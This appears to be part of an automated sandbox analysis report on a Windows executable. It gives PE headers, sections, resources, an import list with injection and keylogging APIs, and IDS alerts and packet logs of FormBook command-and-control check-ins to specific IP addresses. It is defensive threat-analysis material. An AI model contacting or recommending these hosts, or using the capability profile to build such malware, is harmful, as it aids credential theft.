                                                                                        shr ecx, 02h
                                                                                        and edx, 03h
                                                                                        cmp ecx, 08h
                                                                                        jc 00007F9C5CD9C7CCh
                                                                                        rep movsd
                                                                                        jmp dword ptr [00416494h+edx*4]
                                                                                        nop
                                                                                        mov eax, edi
                                                                                        mov edx, 00000003h
                                                                                        sub ecx, 04h
                                                                                        jc 00007F9C5CD9C7AEh
                                                                                        and eax, 03h
                                                                                        add ecx, eax
                                                                                        jmp dword ptr [004163A8h+eax*4]
                                                                                        jmp dword ptr [004164A4h+ecx*4]
                                                                                        nop
                                                                                        jmp dword ptr [00416428h+ecx*4]
                                                                                        nop
                                                                                        mov eax, E4004163h
                                                                                        arpl word ptr [ecx+00h], ax
                                                                                        or byte ptr [ecx+eax*2+00h], ah
                                                                                        and edx, ecx
                                                                                        mov al, byte ptr [esi]
                                                                                        mov byte ptr [edi], al
                                                                                        mov al, byte ptr [esi+01h]
                                                                                        mov byte ptr [edi+01h], al
                                                                                        mov al, byte ptr [esi+02h]
                                                                                        shr ecx, 02h
                                                                                        mov byte ptr [edi+02h], al
                                                                                        add esi, 03h
                                                                                        add edi, 03h
                                                                                        cmp ecx, 08h
                                                                                        jc 00007F9C5CD9C76Eh

                                                                                        Rich Headers

                                                                                        Programming Language:
                                                                                        • [ASM] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [C++] VS2008 SP1 build 30729
                                                                                        • [ C ] VS2005 build 50727
                                                                                        • [IMP] VS2005 build 50727
                                                                                        • [ASM] VS2008 build 21022
                                                                                        • [RES] VS2008 build 21022
                                                                                        • [LNK] VS2008 SP1 build 30729

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                        RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                        RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                        RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                        RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                        RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                        RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                        RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                        RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                        RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                        RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                        RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                        Imports

                                                                                        DLLImport
                                                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                        USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                        GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                        OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishGreat Britain
                                                                                        EnglishUnited States

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-09T12:51:22.543345+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249163188.114.97.380TCP
                                                                                        2024-10-09T12:51:37.633091+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916552.13.151.17980TCP
                                                                                        2024-10-09T12:51:40.764813+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916652.13.151.17980TCP
                                                                                        2024-10-09T12:51:42.735042+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916752.13.151.17980TCP
                                                                                        2024-10-09T12:51:45.868834+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224916852.13.151.17980TCP
                                                                                        2024-10-09T12:51:50.940532+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916984.32.84.3280TCP
                                                                                        2024-10-09T12:51:53.963058+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917084.32.84.3280TCP
                                                                                        2024-10-09T12:51:56.214866+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224917184.32.84.3280TCP
                                                                                        2024-10-09T12:51:59.210394+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224917284.32.84.3280TCP
                                                                                        2024-10-09T12:52:04.635890+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249173103.106.67.11280TCP
                                                                                        2024-10-09T12:52:07.816945+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249174103.106.67.11280TCP
                                                                                        2024-10-09T12:52:09.727712+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249175103.106.67.11280TCP
                                                                                        2024-10-09T12:52:12.936213+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249176103.106.67.11280TCP
                                                                                        2024-10-09T12:52:17.989641+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249177188.114.97.380TCP
                                                                                        2024-10-09T12:52:22.056747+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249178188.114.97.380TCP
                                                                                        2024-10-09T12:52:23.080526+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249179188.114.97.380TCP
                                                                                        2024-10-09T12:53:05.030212+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249180188.114.97.380TCP
                                                                                        2024-10-09T12:53:10.077300+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22491813.33.130.19080TCP
                                                                                        2024-10-09T12:53:13.067929+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22491823.33.130.19080TCP
                                                                                        2024-10-09T12:53:15.155215+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22491833.33.130.19080TCP
                                                                                        2024-10-09T12:53:18.168317+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.22491843.33.130.19080TCP
                                                                                        2024-10-09T12:53:23.197070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249185217.70.184.5080TCP
                                                                                        2024-10-09T12:53:26.318584+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249186217.70.184.5080TCP
                                                                                        2024-10-09T12:53:28.273570+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249187217.70.184.5080TCP
                                                                                        2024-10-09T12:53:31.428915+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249188217.70.184.5080TCP
                                                                                        2024-10-09T12:53:36.502497+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224918954.38.220.8580TCP
                                                                                        2024-10-09T12:53:39.969207+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224919054.38.220.8580TCP
                                                                                        2024-10-09T12:53:41.769641+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224919154.38.220.8580TCP
                                                                                        2024-10-09T12:53:45.024325+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224919254.38.220.8580TCP
                                                                                        2024-10-09T12:53:50.244862+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249193103.224.182.24280TCP
                                                                                        2024-10-09T12:53:53.369682+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249194103.224.182.24280TCP
                                                                                        2024-10-09T12:53:55.329927+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249195103.224.182.24280TCP
                                                                                        2024-10-09T12:53:58.533913+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249196103.224.182.24280TCP
                                                                                        2024-10-09T12:54:03.613315+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249197209.74.64.18780TCP
                                                                                        2024-10-09T12:54:06.864648+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249198209.74.64.18780TCP
                                                                                        2024-10-09T12:54:08.722747+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249199209.74.64.18780TCP
                                                                                        2024-10-09T12:54:11.868126+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249200209.74.64.18780TCP
                                                                                        2024-10-09T12:54:16.997250+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920165.21.196.9080TCP
                                                                                        2024-10-09T12:54:20.206307+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920265.21.196.9080TCP
                                                                                        2024-10-09T12:54:22.091368+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920365.21.196.9080TCP
                                                                                        2024-10-09T12:54:25.290589+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224920465.21.196.9080TCP
                                                                                        2024-10-09T12:54:30.340626+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920515.197.148.3380TCP
                                                                                        2024-10-09T12:54:33.333791+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920615.197.148.3380TCP
                                                                                        2024-10-09T12:54:35.591212+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224920715.197.148.3380TCP
                                                                                        2024-10-09T12:54:38.869836+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224920815.197.148.3380TCP
                                                                                        2024-10-09T12:54:43.948228+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22492093.33.130.19080TCP
                                                                                        2024-10-09T12:54:46.957321+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22492103.33.130.19080TCP
                                                                                        2024-10-09T12:54:49.036275+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22492113.33.130.19080TCP
                                                                                        2024-10-09T12:54:52.153263+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.22492123.33.130.19080TCP
                                                                                        2024-10-09T12:54:57.920932+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.22492138.210.49.13980TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 9, 2024 12:51:21.955775976 CEST4916380192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:51:21.960670948 CEST8049163188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:51:21.960736036 CEST4916380192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:51:21.968657017 CEST4916380192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:51:21.973613024 CEST8049163188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:51:22.542781115 CEST8049163188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:51:22.543217897 CEST8049163188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:51:22.543344975 CEST4916380192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:51:22.546297073 CEST4916380192.168.2.22188.114.97.3
                                                                                        Oct 9, 2024 12:51:22.551167011 CEST8049163188.114.97.3192.168.2.22
                                                                                        Oct 9, 2024 12:51:27.512286901 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:27.517222881 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:27.517290115 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:27.517379045 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:27.523718119 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.057966948 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058020115 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058053970 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058085918 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058120012 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058121920 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058151960 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058151960 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058152914 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058161974 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058187008 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058195114 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058219910 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058228970 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058254957 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058264971 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058294058 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.058300018 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.058337927 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.063237906 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.063313007 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.076365948 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.150069952 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150119066 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150157928 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150170088 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150207996 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.150346041 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150372982 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.150383949 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.150425911 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150439024 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150476933 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.150479078 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.150511980 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.151144028 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.151177883 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.151192904 CEST804916445.33.6.223192.168.2.22
                                                                                        Oct 9, 2024 12:51:28.151194096 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.151211977 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.151232958 CEST4916480192.168.2.2245.33.6.223
                                                                                        Oct 9, 2024 12:51:28.151705027 CEST804916445.33.6.223192.168.2.22
